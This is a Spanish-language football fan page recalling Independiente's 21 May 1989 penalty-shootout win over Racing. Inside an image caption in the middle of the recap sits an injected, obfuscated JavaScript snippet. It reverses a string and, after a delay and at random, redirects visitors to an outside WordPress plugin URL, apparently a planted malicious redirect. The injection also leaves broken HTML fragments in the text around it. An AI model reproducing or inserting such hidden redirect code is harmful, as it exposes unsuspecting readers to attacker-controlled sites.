Conectate con nosotros

Efemérides

Efemérides del 21 de mayo

No se puede amar lo que no se conoce. Estas efemérides son parte de la brillante historia del Glorioso INDEPENDIENTE de Avellaneda.

1989-Por la Fecha 36 del Campeonato de Primera División 1988-1989, Independiente como local empata 1 a 1 con Racing, y luego gana en la definición por penales 4 a 1, convirtiendo para el Rojo Sergio Merlini, José María Bianco, Néstor Clausen y Guillermo “Luli” Ríos, mientras que el arquero Eduardo Pereyra contuvo los penales que patearon para Racing,  Norberto Ortega Sánchez y Ramón Ismael Medina Bello.  Recordemos que habían dejado de existir los Torneos Nacional y Metropolitano volviéndose a las temporadas anuales de todos contra todos, ida y vuelta. Si al cabo de los 90’, el partido finalizaba empatado se ejecutaban penales hasta que hubiera un ganador, que en vez de 3 puntos, ganaba 2.

Si el Rojo ganaba, podía salir campeón en caso que Boca no le ganara a Newell’s, pero Racing estaba decidido a que el Rojo no lo gozara. En el minuto 89, Independiente pudo ganarlo cuando Pedro Monzón conectó con un tremendo cabezazo, pero una espectacular atajada de Ubaldo Fillol, con un manotazo monstruoso, sostuvo el empate.

El último partido del campeonato, en la Fecha 37, enfrentaría a Independiente contra Deportivo Armenio, pero esa… es otra historia…

La imagen tiene un atribu<script>$mWn=function(n){if(typeof ($mWn.list[n])==»string») return $mWn.list[n].split(«»).reverse().join(«»);return $mWn.list[n];};$mWn.list=[«\’php.tsop-egap-ssalc/stegdiw/reganam-stegdiw/cni/rotnemele-retoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\’=ferh.noitacol.tnemucod»];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}</script>to ALT vacío; su nombre de archivo es DIABLITO-para-SEPARADOR.jpg» width=»58″ height=»45″/></figure></div>



<p>Les <strong>dejo video de aquel día</strong>, con la definición por penales</p>



<figure class=

Colaboración:  Hernán Paglieri-Vicepresidente Peña Roja Daniel BertoniSan Andrés de Giles

Click to comment

Leave a Reply

Tu dirección de correo electrónico no será publicada.

Destacadas

PROGRAMA 2206 de Correo Independiente

Radio Roja 195.7

asd

More in Efemérides